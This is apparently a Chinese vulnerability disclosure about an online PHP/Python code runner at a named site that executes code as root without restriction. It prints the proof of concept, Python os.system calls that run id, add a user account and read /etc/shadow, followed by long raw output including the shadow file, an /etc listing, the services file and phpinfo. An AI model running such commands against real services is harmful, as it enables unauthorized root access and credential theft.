2015-12-07: 积极联系厂商并且等待厂商认领中,细节不对外公开 2016-01-21: 厂商已经主动忽略漏洞,细节向公众公开
不容小觑啊
http://www.mcqyy.com/RunCode/phphttp://www.mcqyy.com/RunCode/php5.4/http://www.mcqyy.com/RunCode/php5.6/http://www.mcqyy.com/RunCode/python/http://www.mcqyy.com/RunCode/python3/
在运行PHP和Python的时候并没有做权限界定,导致php和python权限过大可以执行系统命令Python运行
import osos.system('uname -a')os.system('id')os.system('useradd syst')os.system('cat /etc/shadow')os.system('ls /etc/ -alh')os.system('cat /etc/services')
Linux 9f6a88efd08f 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 GNU/Linuxuid=0(root) gid=0(root) groups=0(root)root:*:16553:0:99999:7:::daemon:*:16553:0:99999:7:::bin:*:16553:0:99999:7:::sys:*:16553:0:99999:7:::sync:*:16553:0:99999:7:::games:*:16553:0:99999:7:::man:*:16553:0:99999:7:::lp:*:16553:0:99999:7:::mail:*:16553:0:99999:7:::news:*:16553:0:99999:7:::uucp:*:16553:0:99999:7:::proxy:*:16553:0:99999:7:::www-data:*:16553:0:99999:7:::backup:*:16553:0:99999:7:::list:*:16553:0:99999:7:::irc:*:16553:0:99999:7:::gnats:*:16553:0:99999:7:::nobody:*:16553:0:99999:7:::systemd-timesync:*:16553:0:99999:7:::systemd-network:*:16553:0:99999:7:::systemd-resolve:*:16553:0:99999:7:::systemd-bus-proxy:*:16553:0:99999:7:::syst:!:16775:0:99999:7:::total 484Kdrwxr-xr-x 54 root root 4.0K Dec 6 12:41 .drwxr-xr-x 44 root root 4.0K Dec 6 12:41 ..-rw------- 1 root root 0 Apr 28 2015 .pwd.lock-rw-r--r-- 1 root root 3.0K Apr 28 2015 adduser.confdrwxr-xr-x 2 root root 4.0K Oct 21 03:17 alternativesdrwxr-xr-x 6 root root 4.0K Apr 28 2015 apt-rw-r--r-- 1 root root 1.9K Nov 12 2014 bash.bashrcdrwxr-xr-x 2 root root 4.0K Apr 28 2015 bash_completion.d-rw-r--r-- 1 root root 367 May 18 2014 bindresvport.blacklistdrwxr-xr-x 2 root root 4.0K Apr 16 2015 binfmt.ddrwxr-xr-x 3 root root 4.0K Oct 21 03:17 ca-certificates-rw-r--r-- 1 root root 7.6K Oct 21 03:17 ca-certificates.confdrwxr-xr-x 2 root root 4.0K Apr 28 2015 cron.dailydrwxr-xr-x 3 root root 4.0K Apr 16 2015 dbus-1-rw-r--r-- 1 root root 2.9K Mar 19 2015 debconf.conf-rw-r--r-- 1 root root 4 Nov 30 2014 debian_versiondrwxr-xr-x 2 root root 4.0K Apr 28 2015 default-rw-r--r-- 1 root root 604 May 15 2012 deluser.confdrwxr-xr-x 4 root root 4.0K Oct 21 03:17 dpkg-rw-r--r-- 1 root root 0 Apr 28 2015 environment-rw-r--r-- 1 root root 37 Apr 28 2015 fstab-rw-r--r-- 1 root root 2.6K Feb 7 2014 gai.conf-rw-r--r-- 1 root root 590 Dec 6 12:41 group-rw------- 1 root root 577 Apr 28 2015 group--rw-r----- 1 root shadow 496 Dec 6 12:41 gshadow-rw------- 1 root root 487 Apr 28 2015 gshadow--rw-r--r-- 1 root root 9 Aug 7 2006 host.conf-rw-r--r-- 1 root root 13 Dec 6 12:41 hostname-rw-r--r-- 1 root root 175 Dec 6 12:41 hostsdrwxr-xr-x 2 root root 4.0K Apr 28 2015 initdrwxr-xr-x 2 root root 4.0K Apr 28 2015 init.d-rw-r--r-- 1 root root 1.8K Aug 3 2014 inputrcdrwxr-xr-x 3 root root 4.0K Nov 23 2012 insserv-rw-r--r-- 1 root root 859 Nov 23 2012 insserv.confdrwxr-xr-x 2 root root 4.0K Nov 23 2012 insserv.conf.ddrwxr-xr-x 2 root root 4.0K Apr 28 2015 iproute2-rw-r--r-- 1 root root 26 Nov 30 2014 issue-rw-r--r-- 1 root root 19 Nov 30 2014 issue.netdrwxr-xr-x 3 root root 4.0K Apr 28 2015 kernel-rw-r--r-- 1 root root 12K Oct 21 03:24 ld.so.cache-rw-r--r-- 1 root root 34 Jun 17 2014 ld.so.confdrwxr-xr-x 2 root root 4.0K Oct 21 03:17 ld.so.conf.d-rw-r--r-- 1 root root 191 Sep 7 2014 libaudit.conf-rw-r--r-- 1 root root 118 Apr 28 2015 localtime-rw-r--r-- 1 root root 11K Nov 20 2014 login.defsdrwxr-xr-x 2 root root 4.0K Apr 28 2015 logrotate.d-r--r--r-- 1 root root 33 Apr 28 2015 machine-id-rw-r--r-- 1 root root 111 Mar 10 2015 magic-rw-r--r-- 1 root root 111 Mar 10 2015 magic.mime-rw-r--r-- 1 root root 1.6K May 7 2015 mailcap-rw-r--r-- 1 root root 449 Dec 28 2014 mailcap.order-rw-r--r-- 1 root root 24K Dec 28 2014 mime.types-rw-r--r-- 1 root root 956 Feb 25 2015 mke2fs.confdrwxr-xr-x 2 root root 4.0K Apr 28 2015 modprobe.ddrwxr-xr-x 2 root root 4.0K Apr 28 2015 modules-load.d-rw-r--r-- 1 root root 286 Nov 30 2014 motdlrwxrwxrwx 1 root root 12 Dec 6 12:41 mtab -> /proc/mountsdrwxr-xr-x 3 root root 4.0K Oct 21 03:24 mysqldrwxr-xr-x 3 root root 4.0K Apr 6 2015 network-rw-r--r-- 1 root root 60 Apr 28 2015 networks-rw-r--r-- 1 root root 497 May 4 2014 nsswitch.confdrwxr-xr-x 2 root root 4.0K Apr 28 2015 optlrwxrwxrwx 1 root root 21 Nov 30 2014 os-release -> ../usr/lib/os-release-rw-r--r-- 1 root root 552 Aug 9 2014 pam.confdrwxr-xr-x 2 root root 4.0K Apr 28 2015 pam.d-rw-r--r-- 1 root root 1.3K Dec 6 12:41 passwd-rw------- 1 root root 1.2K Apr 28 2015 passwd-drwxr-xr-x 4 root root 4.0K Oct 21 03:17 perl-rw-r--r-- 1 root root 761 Oct 22 2014 profiledrwxr-xr-x 2 root root 4.0K Nov 30 2014 profile.d-rw-r--r-- 1 root root 2.9K Oct 21 2014 protocolsdrwxr-xr-x 2 root root 4.0K May 7 2015 pythondrwxr-xr-x 2 root root 4.0K May 7 2015 python2.7drwxr-xr-x 2 root root 4.0K May 7 2015 python3drwxr-xr-x 2 root root 4.0K May 7 2015 python3.4-rwxr-xr-x 1 root root 306 Apr 28 2015 rc.localdrwxr-xr-x 2 root root 4.0K Apr 28 2015 rc0.ddrwxr-xr-x 2 root root 4.0K Apr 28 2015 rc1.ddrwxr-xr-x 2 root root 4.0K Apr 28 2015 rc2.ddrwxr-xr-x 2 root root 4.0K Apr 28 2015 rc3.ddrwxr-xr-x 2 root root 4.0K Apr 28 2015 rc4.ddrwxr-xr-x 2 root root 4.0K Apr 28 2015 rc5.ddrwxr-xr-x 2 root root 4.0K Apr 28 2015 rc6.ddrwxr-xr-x 2 root root 4.0K Apr 28 2015 rcS.d-rw-r--r-- 1 root root 237 Dec 6 12:41 resolv.conf-rwxr-xr-x 1 root root 268 Nov 8 2014 rmt-rw-r--r-- 1 root root 887 Oct 21 2014 rpc-rw-r--r-- 1 root root 4.0K Nov 20 2014 securettydrwxr-xr-x 4 root root 4.0K Apr 28 2015 securitydrwxr-xr-x 2 root root 4.0K Apr 28 2015 selinux-rw-r--r-- 1 root root 20K Oct 21 2014 servicesdrwxr-xr-x 2 root root 4.0K Oct 21 03:19 sgml-rw-r----- 1 root shadow 652 Dec 6 12:41 shadow-rw------- 1 root root 626 Apr 28 2015 shadow--rw-r--r-- 1 root root 73 Apr 28 2015 shellsdrwxr-xr-x 2 root root 4.0K Apr 28 2015 skeldrwxr-xr-x 4 root root 4.0K Oct 21 03:17 ssl-rw-r--r-- 1 root root 771 Jun 9 2012 staff-group-for-usr-local-rw-r--r-- 1 root root 137 Dec 6 12:41 subgid-rw------- 1 root root 119 Apr 28 2015 subgid--rw-r--r-- 1 root root 137 Dec 6 12:41 subuid-rw------- 1 root root 119 Apr 28 2015 subuid--rw-r--r-- 1 root root 2.1K Mar 6 2015 sysctl.confdrwxr-xr-x 2 root root 4.0K Apr 28 2015 sysctl.ddrwxr-xr-x 6 root root 4.0K Apr 28 2015 systemddrwxr-xr-x 2 root root 4.0K Apr 28 2015 terminfo-rw-r--r-- 1 root root 8 Apr 28 2015 timezonedrwxr-xr-x 2 root root 4.0K Apr 16 2015 tmpfiles.ddrwxr-xr-x 4 root root 4.0K Apr 28 2015 udevdrwxr-xr-x 3 root root 4.0K Apr 16 2015 xdgdrwxr-xr-x 2 root root 4.0K Oct 21 03:19 xml# Network services, Internet style## Note that it is presently the policy of IANA to assign a single well-known# port number for both TCP and UDP; hence, officially ports have two entries# even if the protocol doesn't support UDP operations.## Updated from http://www.iana.org/assignments/port-numbers and other# sources like http://www.freebsd.org/cgi/cvsweb.cgi/src/etc/services .# New ports will be added on request if they have been officially assigned# by IANA and used in the real-world or are needed by a debian package.# If you need a huge list of used numbers please install the nmap package.tcpmux 1/tcp # TCP port service multiplexerecho 7/tcpecho 7/udpdiscard 9/tcp sink nulldiscard 9/udp sink nullsystat 11/tcp usersdaytime 13/tcpdaytime 13/udpnetstat 15/tcpqotd 17/tcp quotemsp 18/tcp # message send protocolmsp 18/udpchargen 19/tcp ttytst sourcechargen 19/udp ttytst sourceftp-data 20/tcpftp 21/tcpfsp 21/udp fspdssh 22/tcp # SSH Remote Login Protocolssh 22/udptelnet 23/tcpsmtp 25/tcp mailtime 37/tcp timservertime 37/udp timserverrlp 39/udp resource # resource locationnameserver 42/tcp name # IEN 116whois 43/tcp nicnametacacs 49/tcp # Login Host Protocol (TACACS)tacacs 49/udpre-mail-ck 50/tcp # Remote Mail Checking Protocolre-mail-ck 50/udpdomain 53/tcp # Domain Name Serverdomain 53/udpmtp 57/tcp # deprecatedtacacs-ds 65/tcp # TACACS-Database Servicetacacs-ds 65/udpbootps 67/tcp # BOOTP serverbootps 67/udpbootpc 68/tcp # BOOTP clientbootpc 68/udptftp 69/udpgopher 70/tcp # Internet Gophergopher 70/udprje 77/tcp netrjsfinger 79/tcphttp 80/tcp www # WorldWideWeb HTTPhttp 80/udp # HyperText Transfer Protocollink 87/tcp ttylinkkerberos 88/tcp kerberos5 krb5 kerberos-sec # Kerberos v5kerberos 88/udp kerberos5 krb5 kerberos-sec # Kerberos v5supdup 95/tcphostnames 101/tcp hostname # usually from sri-niciso-tsap 102/tcp tsap # part of ISODEacr-nema 104/tcp dicom # Digital Imag. & Comm. 300acr-nema 104/udp dicomcsnet-ns 105/tcp cso-ns # also used by CSO name servercsnet-ns 105/udp cso-nsrtelnet 107/tcp # Remote Telnetrtelnet 107/udppop2 109/tcp postoffice pop-2 # POP version 2pop2 109/udp pop-2pop3 110/tcp pop-3 # POP version 3pop3 110/udp pop-3sunrpc 111/tcp portmapper # RPC 4.0 portmappersunrpc 111/udp portmapperauth 113/tcp authentication tap identsftp 115/tcpuucp-path 117/tcpnntp 119/tcp readnews untp # USENET News Transfer Protocolntp 123/tcpntp 123/udp # Network Time Protocolpwdgen 129/tcp # PWDGEN servicepwdgen 129/udploc-srv 135/tcp epmap # Location Serviceloc-srv 135/udp epmapnetbios-ns 137/tcp # NETBIOS Name Servicenetbios-ns 137/udpnetbios-dgm 138/tcp # NETBIOS Datagram Servicenetbios-dgm 138/udpnetbios-ssn 139/tcp # NETBIOS session servicenetbios-ssn 139/udpimap2 143/tcp imap # Interim Mail Access P 2 and 4imap2 143/udp imapsnmp 161/tcp # Simple Net Mgmt Protocolsnmp 161/udpsnmp-trap 162/tcp snmptrap # Traps for SNMPsnmp-trap 162/udp snmptrapcmip-man 163/tcp # ISO mgmt over IP (CMOT)cmip-man 163/udpcmip-agent 164/tcpcmip-agent 164/udpmailq 174/tcp # Mailer transport queue for Zmailermailq 174/udpxdmcp 177/tcp # X Display Mgr. Control Protoxdmcp 177/udpnextstep 178/tcp NeXTStep NextStep # NeXTStep windownextstep 178/udp NeXTStep NextStep # serverbgp 179/tcp # Border Gateway Protocolbgp 179/udpprospero 191/tcp # Cliff Neuman's Prosperoprospero 191/udpirc 194/tcp # Internet Relay Chatirc 194/udpsmux 199/tcp # SNMP Unix Multiplexersmux 199/udpat-rtmp 201/tcp # AppleTalk routingat-rtmp 201/udpat-nbp 202/tcp # AppleTalk name bindingat-nbp 202/udpat-echo 204/tcp # AppleTalk echoat-echo 204/udpat-zis 206/tcp # AppleTalk zone informationat-zis 206/udpqmtp 209/tcp # Quick Mail Transfer Protocolqmtp 209/udpz3950 210/tcp wais # NISO Z39.50 databasez3950 210/udp waisipx 213/tcp # IPXipx 213/udpimap3 220/tcp # Interactive Mail Accessimap3 220/udp # Protocol v3pawserv 345/tcp # Perf Analysis Workbenchpawserv 345/udpzserv 346/tcp # Zebra serverzserv 346/udpfatserv 347/tcp # Fatmen Serverfatserv 347/udprpc2portmap 369/tcprpc2portmap 369/udp # Coda portmappercodaauth2 370/tcpcodaauth2 370/udp # Coda authentication serverclearcase 371/tcp Clearcaseclearcase 371/udp Clearcaseulistserv 372/tcp # UNIX Listservulistserv 372/udpldap 389/tcp # Lightweight Directory Access Protocolldap 389/udpimsp 406/tcp # Interactive Mail Support Protocolimsp 406/udpsvrloc 427/tcp # Server Locationsvrloc 427/udphttps 443/tcp # http protocol over TLS/SSLhttps 443/udpsnpp 444/tcp # Simple Network Paging Protocolsnpp 444/udpmicrosoft-ds 445/tcp # Microsoft Naked CIFSmicrosoft-ds 445/udpkpasswd 464/tcpkpasswd 464/udpurd 465/tcp ssmtp smtps # URL Rendesvous Directory for SSMsaft 487/tcp # Simple Asynchronous File Transfersaft 487/udpisakmp 500/tcp # IPsec - Internet Security Associationisakmp 500/udp # and Key Management Protocolrtsp 554/tcp # Real Time Stream Control Protocolrtsp 554/udpnqs 607/tcp # Network Queuing systemnqs 607/udpnpmp-local 610/tcp dqs313_qmaster # npmp-local / DQSnpmp-local 610/udp dqs313_qmasternpmp-gui 611/tcp dqs313_execd # npmp-gui / DQSnpmp-gui 611/udp dqs313_execdhmmp-ind 612/tcp dqs313_intercell # HMMP Indication / DQShmmp-ind 612/udp dqs313_intercellasf-rmcp 623/udp # ASF Remote Management and Control Protocolqmqp 628/tcpqmqp 628/udpipp 631/tcp # Internet Printing Protocolipp 631/udp## UNIX specific services#exec 512/tcpbiff 512/udp comsatlogin 513/tcpwho 513/udp whodshell 514/tcp cmd # no passwords usedsyslog 514/udpprinter 515/tcp spooler # line printer spoolertalk 517/udpntalk 518/udproute 520/udp router routed # RIPtimed 525/udp timeservertempo 526/tcp newdatecourier 530/tcp rpcconference 531/tcp chatnetnews 532/tcp readnewsnetwall 533/udp # for emergency broadcastsgdomap 538/tcp # GNUstep distributed objectsgdomap 538/udpuucp 540/tcp uucpd # uucp daemonklogin 543/tcp # Kerberized `rlogin' (v5)kshell 544/tcp krcmd # Kerberized `rsh' (v5)dhcpv6-client 546/tcpdhcpv6-client 546/udpdhcpv6-server 547/tcpdhcpv6-server 547/udpafpovertcp 548/tcp # AFP over TCPafpovertcp 548/udpidfp 549/tcpidfp 549/udpremotefs 556/tcp rfs_server rfs # Brunhoff remote filesystemnntps 563/tcp snntp # NNTP over SSLnntps 563/udp snntpsubmission 587/tcp # Submission [RFC4409]submission 587/udpldaps 636/tcp # LDAP over SSLldaps 636/udptinc 655/tcp # tinc control porttinc 655/udpsilc 706/tcpsilc 706/udpkerberos-adm 749/tcp # Kerberos `kadmin' (v5)#webster 765/tcp # Network dictionarywebster 765/udprsync 873/tcprsync 873/udpftps-data 989/tcp # FTP over SSL (data)ftps 990/tcptelnets 992/tcp # Telnet over SSLtelnets 992/udpimaps 993/tcp # IMAP over SSLimaps 993/udpircs 994/tcp # IRC over SSLircs 994/udppop3s 995/tcp # POP-3 over SSLpop3s 995/udp## From ``Assigned Numbers'':##> The Registered Ports are not controlled by the IANA and on most systems#> can be used by ordinary user processes or programs executed by ordinary#> users.##> Ports are used in the TCP [45,106] to name the ends of logical#> connections which carry long term conversations. For the purpose of#> providing services to unknown callers, a service contact port is#> defined. This list specifies the port used by the server process as its#> contact port. While the IANA can not control uses of these ports it#> does register or list uses of these ports as a convienence to the#> community.#socks 1080/tcp # socks proxy serversocks 1080/udpproofd 1093/tcpproofd 1093/udprootd 1094/tcprootd 1094/udpopenvpn 1194/tcpopenvpn 1194/udprmiregistry 1099/tcp # Java RMI Registryrmiregistry 1099/udpkazaa 1214/tcpkazaa 1214/udpnessus 1241/tcp # Nessus vulnerabilitynessus 1241/udp # assessment scannerlotusnote 1352/tcp lotusnotes # Lotus Notelotusnote 1352/udp lotusnotesms-sql-s 1433/tcp # Microsoft SQL Serverms-sql-s 1433/udpms-sql-m 1434/tcp # Microsoft SQL Monitorms-sql-m 1434/udpingreslock 1524/tcpingreslock 1524/udpprospero-np 1525/tcp # Prospero non-privilegedprospero-np 1525/udpdatametrics 1645/tcp old-radiusdatametrics 1645/udp old-radiussa-msg-port 1646/tcp old-radacctsa-msg-port 1646/udp old-radacctkermit 1649/tcpkermit 1649/udpgroupwise 1677/tcpgroupwise 1677/udpl2f 1701/tcp l2tpl2f 1701/udp l2tpradius 1812/tcpradius 1812/udpradius-acct 1813/tcp radacct # Radius Accountingradius-acct 1813/udp radacctmsnp 1863/tcp # MSN Messengermsnp 1863/udpunix-status 1957/tcp # remstats unix-status serverlog-server 1958/tcp # remstats log serverremoteping 1959/tcp # remstats remoteping servercisco-sccp 2000/tcp # Cisco SCCPcisco-sccp 2000/udpsearch 2010/tcp ndtppipe-server 2010/tcp pipe_servernfs 2049/tcp # Network File Systemnfs 2049/udp # Network File Systemgnunet 2086/tcpgnunet 2086/udprtcm-sc104 2101/tcp # RTCM SC-104 IANA 1/29/99rtcm-sc104 2101/udpgsigatekeeper 2119/tcpgsigatekeeper 2119/udpgris 2135/tcp # Grid Resource Information Servergris 2135/udpcvspserver 2401/tcp # CVS client/server operationscvspserver 2401/udpvenus 2430/tcp # codacon portvenus 2430/udp # Venus callback/wbc interfacevenus-se 2431/tcp # tcp side effectsvenus-se 2431/udp # udp sftp side effectcodasrv 2432/tcp # not usedcodasrv 2432/udp # server portcodasrv-se 2433/tcp # tcp side effectscodasrv-se 2433/udp # udp sftp side effectmon 2583/tcp # MON trapsmon 2583/udpdict 2628/tcp # Dictionary serverdict 2628/udpf5-globalsite 2792/tcpf5-globalsite 2792/udpgsiftp 2811/tcpgsiftp 2811/udpgpsd 2947/tcpgpsd 2947/udpgds-db 3050/tcp gds_db # InterBase servergds-db 3050/udp gds_dbicpv2 3130/tcp icp # Internet Cache Protocolicpv2 3130/udp icpiscsi-target 3260/tcpmysql 3306/tcpmysql 3306/udpnut 3493/tcp # Network UPS Toolsnut 3493/udpdistcc 3632/tcp # distributed compilerdistcc 3632/udpdaap 3689/tcp # Digital Audio Access Protocoldaap 3689/udpsvn 3690/tcp subversion # Subversion protocolsvn 3690/udp subversionsuucp 4031/tcp # UUCP over SSLsuucp 4031/udpsysrqd 4094/tcp # sysrq daemonsysrqd 4094/udpsieve 4190/tcp # ManageSieve Protocolepmd 4369/tcp # Erlang Port Mapper Daemonepmd 4369/udpremctl 4373/tcp # Remote Authenticated Command Serviceremctl 4373/udpf5-iquery 4353/tcp # F5 iQueryf5-iquery 4353/udpipsec-nat-t 4500/udp # IPsec NAT-Traversal [RFC3947]iax 4569/tcp # Inter-Asterisk eXchangeiax 4569/udpmtn 4691/tcp # monotone Netsync Protocolmtn 4691/udpradmin-port 4899/tcp # RAdmin Portradmin-port 4899/udprfe 5002/udp # Radio Free Ethernetrfe 5002/tcpmmcc 5050/tcp # multimedia conference control tool (Yahoo IM)mmcc 5050/udpsip 5060/tcp # Session Initiation Protocolsip 5060/udpsip-tls 5061/tcpsip-tls 5061/udpaol 5190/tcp # AIMaol 5190/udpxmpp-client 5222/tcp jabber-client # Jabber Client Connectionxmpp-client 5222/udp jabber-clientxmpp-server 5269/tcp jabber-server # Jabber Server Connectionxmpp-server 5269/udp jabber-servercfengine 5308/tcpcfengine 5308/udpmdns 5353/tcp # Multicast DNSmdns 5353/udppostgresql 5432/tcp postgres # PostgreSQL Databasepostgresql 5432/udp postgresfreeciv 5556/tcp rptp # Freeciv gameplayfreeciv 5556/udpamqps 5671/tcp # AMQP protocol over TLS/SSLamqp 5672/tcpamqp 5672/udpamqp 5672/sctpggz 5688/tcp # GGZ Gaming Zoneggz 5688/udpx11 6000/tcp x11-0 # X Window Systemx11 6000/udp x11-0x11-1 6001/tcpx11-1 6001/udpx11-2 6002/tcpx11-2 6002/udpx11-3 6003/tcpx11-3 6003/udpx11-4 6004/tcpx11-4 6004/udpx11-5 6005/tcpx11-5 6005/udpx11-6 6006/tcpx11-6 6006/udpx11-7 6007/tcpx11-7 6007/udpgnutella-svc 6346/tcp # gnutellagnutella-svc 6346/udpgnutella-rtr 6347/tcp # gnutellagnutella-rtr 6347/udpsge-qmaster 6444/tcp sge_qmaster # Grid Engine Qmaster Servicesge-qmaster 6444/udp sge_qmastersge-execd 6445/tcp sge_execd # Grid Engine Execution Servicesge-execd 6445/udp sge_execdmysql-proxy 6446/tcp # MySQL Proxymysql-proxy 6446/udpafs3-fileserver 7000/tcp bbs # file server itselfafs3-fileserver 7000/udp bbsafs3-callback 7001/tcp # callbacks to cache managersafs3-callback 7001/udpafs3-prserver 7002/tcp # users & groups databaseafs3-prserver 7002/udpafs3-vlserver 7003/tcp # volume location databaseafs3-vlserver 7003/udpafs3-kaserver 7004/tcp # AFS/Kerberos authenticationafs3-kaserver 7004/udpafs3-volser 7005/tcp # volume managment serverafs3-volser 7005/udpafs3-errors 7006/tcp # error interpretation serviceafs3-errors 7006/udpafs3-bos 7007/tcp # basic overseer processafs3-bos 7007/udpafs3-update 7008/tcp # server-to-server updaterafs3-update 7008/udpafs3-rmtsys 7009/tcp # remote cache manager serviceafs3-rmtsys 7009/udpfont-service 7100/tcp xfs # X Font Servicefont-service 7100/udp xfshttp-alt 8080/tcp webcache # WWW caching servicehttp-alt 8080/udpbacula-dir 9101/tcp # Bacula Directorbacula-dir 9101/udpbacula-fd 9102/tcp # Bacula File Daemonbacula-fd 9102/udpbacula-sd 9103/tcp # Bacula Storage Daemonbacula-sd 9103/udpxmms2 9667/tcp # Cross-platform Music Multiplexing Systemxmms2 9667/udpnbd 10809/tcp # Linux Network Block Devicezabbix-agent 10050/tcp # Zabbix Agentzabbix-agent 10050/udpzabbix-trapper 10051/tcp # Zabbix Trapperzabbix-trapper 10051/udpamanda 10080/tcp # amanda backup servicesamanda 10080/udpdicom 11112/tcphkp 11371/tcp # OpenPGP HTTP Keyserverhkp 11371/udpbprd 13720/tcp # VERITAS NetBackupbprd 13720/udpbpdbm 13721/tcp # VERITAS NetBackupbpdbm 13721/udpbpjava-msvc 13722/tcp # BP Java MSVC Protocolbpjava-msvc 13722/udpvnetd 13724/tcp # Veritas Network Utilityvnetd 13724/udpbpcd 13782/tcp # VERITAS NetBackupbpcd 13782/udpvopied 13783/tcp # VERITAS NetBackupvopied 13783/udpdb-lsp 17500/tcp # Dropbox LanSync Protocoldcap 22125/tcp # dCache Access Protocolgsidcap 22128/tcp # GSI dCache Access Protocolwnn6 22273/tcp # wnn6wnn6 22273/udp## Datagram Delivery Protocol services#rtmp 1/ddp # Routing Table Maintenance Protocolnbp 2/ddp # Name Binding Protocolecho 4/ddp # AppleTalk Echo Protocolzip 6/ddp # Zone Information Protocol#=========================================================================# The remaining port numbers are not as allocated by IANA.#=========================================================================# Kerberos (Project Athena/MIT) services# Note that these are for Kerberos v4, and are unofficial. Sites running# v4 should uncomment these and comment out the v5 entries above.#kerberos4 750/udp kerberos-iv kdc # Kerberos (server)kerberos4 750/tcp kerberos-iv kdckerberos-master 751/udp kerberos_master # Kerberos authenticationkerberos-master 751/tcppasswd-server 752/udp passwd_server # Kerberos passwd serverkrb-prop 754/tcp krb_prop krb5_prop hprop # Kerberos slave propagationkrbupdate 760/tcp kreg # Kerberos registrationswat 901/tcp # swatkpop 1109/tcp # Pop with Kerberosknetd 2053/tcp # Kerberos de-multiplexorzephyr-srv 2102/udp # Zephyr serverzephyr-clt 2103/udp # Zephyr serv-hm connectionzephyr-hm 2104/udp # Zephyr hostmanagereklogin 2105/tcp # Kerberos encrypted rlogin# Hmmm. Are we using Kv4 or Kv5 now? Worrying.# The following is probably Kerberos v5 --- ajt@debian.org (11/02/2000)kx 2111/tcp # X over Kerberosiprop 2121/tcp # incremental propagation## Unofficial but necessary (for NetBSD) services#supfilesrv 871/tcp # SUP serversupfiledbg 1127/tcp # SUP debugging## Services added for the Debian GNU/Linux distribution#linuxconf 98/tcp # LinuxConfpoppassd 106/tcp # Eudorapoppassd 106/udpmoira-db 775/tcp moira_db # Moira databasemoira-update 777/tcp moira_update # Moira update protocolmoira-ureg 779/udp moira_ureg # Moira user registrationspamd 783/tcp # spamassassin daemonomirr 808/tcp omirrd # online mirroromirr 808/udp omirrdcustoms 1001/tcp # pmake customs servercustoms 1001/udpskkserv 1178/tcp # skk jisho server portpredict 1210/udp # predict -- satellite trackingrmtcfg 1236/tcp # Gracilis Packeten remote config serverwipld 1300/tcp # Wipl network monitorxtel 1313/tcp # french minitelxtelw 1314/tcp # french minitelsupport 1529/tcp # GNATScfinger 2003/tcp # GNU Fingerfrox 2121/tcp # frox: caching ftp proxyninstall 2150/tcp # ninstall serviceninstall 2150/udpzebrasrv 2600/tcp # zebra servicezebra 2601/tcp # zebra vtyripd 2602/tcp # ripd vty (zebra)ripngd 2603/tcp # ripngd vty (zebra)ospfd 2604/tcp # ospfd vty (zebra)bgpd 2605/tcp # bgpd vty (zebra)ospf6d 2606/tcp # ospf6d vty (zebra)ospfapi 2607/tcp # OSPF-APIisisd 2608/tcp # ISISd vty (zebra)afbackup 2988/tcp # Afbackup systemafbackup 2988/udpafmbackup 2989/tcp # Afmbackup systemafmbackup 2989/udpxtell 4224/tcp # xtell serverfax 4557/tcp # FAX transmission service (old)hylafax 4559/tcp # HylaFAX client-server protocol (new)distmp3 4600/tcp # distmp3host daemonmunin 4949/tcp lrrd # Muninenbd-cstatd 5051/tcp # ENBD client statdenbd-sstatd 5052/tcp # ENBD server statdpcrd 5151/tcp # PCR-1000 Daemonnoclog 5354/tcp # noclogd with TCP (nocol)noclog 5354/udp # noclogd with UDP (nocol)hostmon 5355/tcp # hostmon uses TCP (nocol)hostmon 5355/udp # hostmon uses UDP (nocol)rplay 5555/udp # RPlay audio servicenrpe 5666/tcp # Nagios Remote Plugin Executornsca 5667/tcp # Nagios Agent - NSCAmrtd 5674/tcp # MRT Routing Daemonbgpsim 5675/tcp # MRT Routing Simulatorcanna 5680/tcp # cannaserversyslog-tls 6514/tcp # Syslog over TLS [RFC5425]sane-port 6566/tcp sane saned # SANE network scanner daemonircd 6667/tcp # Internet Relay Chatzope-ftp 8021/tcp # zope management by ftptproxy 8081/tcp # Transparent Proxyomniorb 8088/tcp # OmniORBomniorb 8088/udpclc-build-daemon 8990/tcp # Common lisp build daemonxinetd 9098/tcpmandelspawn 9359/udp mandelbrot # network mandelbrotgit 9418/tcp # Git Version Control Systemzope 9673/tcp # zope serverwebmin 10000/tcpkamanda 10081/tcp # amanda backup services (Kerberos)kamanda 10081/udpamandaidx 10082/tcp # amanda backup servicesamidxtape 10083/tcp # amanda backup servicessmsqp 11201/tcp # Alamin SMS gatewaysmsqp 11201/udpxpilot 15345/tcp # XPilot Contact Portxpilot 15345/udpsgi-cmsd 17001/udp # Cluster membership services daemonsgi-crsd 17002/udpsgi-gcd 17003/udp # SGI Group membership daemonsgi-cad 17004/tcp # Cluster Admin daemonisdnlog 20011/tcp # isdn logging systemisdnlog 20011/udpvboxd 20012/tcp # voice box systemvboxd 20012/udpbinkp 24554/tcp # binkp fidonet protocolasp 27374/tcp # Address Search Protocolasp 27374/udpcsync2 30865/tcp # cluster synchronization tooldircproxy 57000/tcp # Detachable IRC Proxytfido 60177/tcp # fidonet EMSI over telnetfido 60179/tcp # fidonet EMSI over TCP# Local services
PHP运行:
<?phpphpinfo();?>
phpinfo()PHP Version => 5.6.9-0+deb8u1System => Linux 95e72a3898ed 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64Build Date => Jun 5 2015 11:02:42Server API => Command Line InterfaceVirtual Directory Support => disabledConfiguration File (php.ini) Path => /etc/php5/cliLoaded Configuration File => /etc/php5/cli/php.iniScan this dir for additional .ini files => /etc/php5/cli/conf.dAdditional .ini files parsed => /etc/php5/cli/conf.d/05-opcache.ini,/etc/php5/cli/conf.d/10-pdo.ini,/etc/php5/cli/conf.d/20-curl.ini,/etc/php5/cli/conf.d/20-gd.ini,/etc/php5/cli/conf.d/20-intl.ini,/etc/php5/cli/conf.d/20-json.ini,/etc/php5/cli/conf.d/20-mcrypt.ini,/etc/php5/cli/conf.d/20-mysql.ini,/etc/php5/cli/conf.d/20-mysqli.ini,/etc/php5/cli/conf.d/20-pdo_mysql.ini,/etc/php5/cli/conf.d/20-readline.ini,/etc/php5/cli/conf.d/20-xsl.iniPHP API => 20131106PHP Extension => 20131226Zend Extension => 220131226Zend Extension Build => API220131226,NTSPHP Extension Build => API20131226,NTSDebug Build => noThread Safety => disabledZend Signal Handling => disabledZend Memory Manager => enabledZend Multibyte Support => provided by mbstringIPv6 Support => enabledDTrace Support => enabledRegistered PHP Streams => https, ftps, compress.zlib, compress.bzip2, php, file, glob, data, http, ftp, phar, zipRegistered Stream Socket Transports => tcp, udp, unix, udg, ssl, sslv3, tls, tlsv1.0, tlsv1.1, tlsv1.2Registered Stream Filters => zlib.*, bzip2.*, convert.iconv.*, string.rot13, string.toupper, string.tolower, string.strip_tags, convert.*, consumed, dechunk, mcrypt.*, mdecrypt.*This program makes use of the Zend Scripting Language Engine:Zend Engine v2.6.0, Copyright (c) 